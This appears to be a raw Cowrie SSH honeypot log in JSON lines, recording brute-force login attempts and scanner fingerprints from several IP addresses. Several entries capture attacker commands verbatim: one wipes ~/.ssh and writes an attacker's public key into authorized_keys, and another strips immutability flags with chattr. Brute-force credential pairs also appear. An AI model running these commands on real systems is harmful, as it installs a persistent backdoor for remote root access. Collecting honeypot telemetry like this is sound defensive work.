{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:37.637214Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:25:38.330931Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:25:38.331585Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33472,"dst_ip":"1.2.3.4","dst_port":22,"session":"37411dedd9b5","protocol":"ssh","message":"New connection: 212.227.235.229:33472 (1.2.3.4:22) [session: 37411dedd9b5]","sensor":"my-vps","timestamp":"2025-09-08T13:25:38.583614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:38.584530Z","src_ip":"212.227.235.229","session":"37411dedd9b5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:25:38.640196Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:38.641036Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:38.709728Z","src_ip":"212.227.235.229","session":"37411dedd9b5"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":7641,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5b73a3619d6","protocol":"ssh","message":"New connection: 49.247.35.31:7641 (1.2.3.4:22) [session: e5b73a3619d6]","sensor":"my-vps","timestamp":"2025-09-08T13:25:38.905169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:38.913584Z","src_ip":"49.247.35.31","session":"e5b73a3619d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:39.195363Z","src_ip":"49.247.35.31","session":"e5b73a3619d6"}
{"eventid":"cowrie.login.failed","username":"amit","password":"amit2025","message":"login attempt [amit/amit2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:25:39.249799Z","src_ip":"212.227.235.229","session":"37411dedd9b5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:25:40.315030Z","src_ip":"49.247.35.31","session":"e5b73a3619d6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:40.376742Z","src_ip":"212.227.235.229","session":"37411dedd9b5"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:41.585765Z","src_ip":"49.247.35.31","session":"e5b73a3619d6"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":40906,"dst_ip":"1.2.3.4","dst_port":22,"session":"696243526eda","protocol":"ssh","message":"New connection: 49.247.35.31:40906 (1.2.3.4:22) [session: 696243526eda]","sensor":"my-vps","timestamp":"2025-09-08T13:25:41.853544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:41.860817Z","src_ip":"49.247.35.31","session":"696243526eda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:42.139150Z","src_ip":"49.247.35.31","session":"696243526eda"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:25:43.234622Z","src_ip":"49.247.35.31","session":"696243526eda"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:43.516376Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:43.517200Z","src_ip":"49.247.35.31","session":"696243526eda"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50542,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5b1e8b3eeb4","protocol":"ssh","message":"New connection: 134.199.174.250:50542 (1.2.3.4:22) [session: f5b1e8b3eeb4]","sensor":"my-vps","timestamp":"2025-09-08T13:25:45.790619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:25:45.791299Z","src_ip":"134.199.174.250","session":"f5b1e8b3eeb4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:25:46.050697Z","src_ip":"134.199.174.250","session":"f5b1e8b3eeb4"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123abc","message":"login attempt [postgres/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:25:46.933081Z","src_ip":"134.199.174.250","session":"f5b1e8b3eeb4"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:48.198251Z","src_ip":"134.199.174.250","session":"f5b1e8b3eeb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46972,"dst_ip":"1.2.3.4","dst_port":22,"session":"83c01fb4465a","protocol":"ssh","message":"New connection: 212.227.235.229:46972 (1.2.3.4:22) [session: 83c01fb4465a]","sensor":"my-vps","timestamp":"2025-09-08T13:25:54.802802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:54.803691Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:55.036702Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.login.success","username":"root","password":"!234qwer","message":"login attempt [root/!234qwer] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:25:55.983627Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:25:56.498273Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:25:56.498922Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:25:56.500566Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:56.735029Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:25:57.210307Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:25:57.211040Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:25:57.443567Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:57.444398Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47824,"dst_ip":"1.2.3.4","dst_port":22,"session":"e834fb157bc0","protocol":"ssh","message":"New connection: 212.227.235.229:47824 (1.2.3.4:22) [session: e834fb157bc0]","sensor":"my-vps","timestamp":"2025-09-08T13:25:57.667097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:57.670475Z","src_ip":"212.227.235.229","session":"e834fb157bc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:57.900899Z","src_ip":"212.227.235.229","session":"e834fb157bc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36174,"dst_ip":"1.2.3.4","dst_port":22,"session":"901e8207f00a","protocol":"ssh","message":"New connection: 212.227.235.229:36174 (1.2.3.4:22) [session: 901e8207f00a]","sensor":"my-vps","timestamp":"2025-09-08T13:25:58.659391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:58.663866Z","src_ip":"212.227.235.229","session":"901e8207f00a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:25:58.804343Z","src_ip":"212.227.235.229","session":"e834fb157bc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:58.976026Z","src_ip":"212.227.235.229","session":"901e8207f00a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:00.041382Z","src_ip":"212.227.235.229","session":"e834fb157bc0"}
{"eventid":"cowrie.login.failed","username":"vladimir","password":"123456","message":"login attempt [vladimir/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T13:26:00.230581Z","src_ip":"212.227.235.229","session":"901e8207f00a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48714,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5baf4eb8298","protocol":"ssh","message":"New connection: 212.227.235.229:48714 (1.2.3.4:22) [session: f5baf4eb8298]","sensor":"my-vps","timestamp":"2025-09-08T13:26:00.262640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:26:00.265522Z","src_ip":"212.227.235.229","session":"f5baf4eb8298"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":[